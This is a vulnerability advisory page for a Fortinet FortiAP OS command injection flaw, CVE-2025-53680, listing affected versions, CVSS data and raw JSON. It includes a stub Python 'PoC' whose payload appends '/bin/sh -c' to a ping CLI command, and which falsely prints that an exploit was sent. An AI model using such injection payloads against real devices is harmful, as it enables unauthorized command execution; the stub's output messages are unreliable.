Security Vulnerability Report
中文
CVE-2025-53680 CVSS 6.7 MEDIUM

CVE-2025-53680

Published: 2026-05-12 18:16:36
Last Modified: 2026-05-12 18:57:02

Description

An improper neutralization of special elements used in an OS command ("OS Command Injection") vulnerability [CWE-78] vulnerability in Fortinet FortiAP 7.6.0 through 7.6.2, FortiAP 7.4.0 through 7.4.5, FortiAP 7.2 all versions, FortiAP 7.0 all versions, FortiAP 6.4 all versions, FortiAP-U 7.0.0 through 7.0.5, FortiAP-U 6.2 all versions, FortiAP-W2 7.4.0 through 7.4.4, FortiAP-W2 7.2 all versions, FortiAP-W2 7.0 all versions allows an authenticated privileged attacker to execute unauthorized code or commands via crafted CLI requests.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

FortiAP 7.6.0 through 7.6.2
FortiAP 7.4.0 through 7.4.5
FortiAP 7.2 (所有版本)
FortiAP 7.0 (所有版本)
FortiAP 6.4 (所有版本)
FortiAP-U 7.0.0 through 7.0.5
FortiAP-U 6.2 (所有版本)
FortiAP-W2 7.4.0 through 7.4.4
FortiAP-W2 7.2 (所有版本)
FortiAP-W2 7.0 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # This is a conceptual PoC for OS Command Injection via CLI. # It demonstrates how an attacker might inject commands. import sys import socket import time def send_exploit(target_ip, admin_password): try: # Simulate connection to the management interface print(f"[*] Connecting to {target_ip}...") # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # s.connect((target_ip, 22)) # Assuming SSH/CLI access # The vulnerability requires High Privileges (PR:H). # Assuming authenticated session is established. # Malicious CLI request payload # Appending a shell command to a legitimate command payload = "execute ping 127.0.0.1; /bin/sh -c 'id > /tmp/poc.txt'" print(f"[*] Sending payload: {payload}") # In a real scenario, this payload would be sent via the CLI interface # Exploitation leads to command execution on the underlying OS. print("[+] Exploit sent. Check /tmp/poc.txt on target.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) != 3: print("Usage: python3 cve_2025_53680_poc.py <target_ip> <admin_pass>") else: send_exploit(sys.argv[1], sys.argv[2])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53680", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:35.687", "lastModified": "2026-05-12T18:57:02.307", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper neutralization of special elements used in an OS command (\"OS Command Injection\") vulnerability [CWE-78] vulnerability in Fortinet FortiAP 7.6.0 through 7.6.2, FortiAP 7.4.0 through 7.4.5, FortiAP 7.2 all versions, FortiAP 7.0 all versions, FortiAP 6.4 all versions, FortiAP-U 7.0.0 through 7.0.5, FortiAP-U 6.2 all versions, FortiAP-W2 7.4.0 through 7.4.4, FortiAP-W2 7.2 all versions, FortiAP-W2 7.0 all versions allows an authenticated privileged attacker to execute unauthorized code or commands via crafted CLI requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-131", "source": "[email protected]"}]}}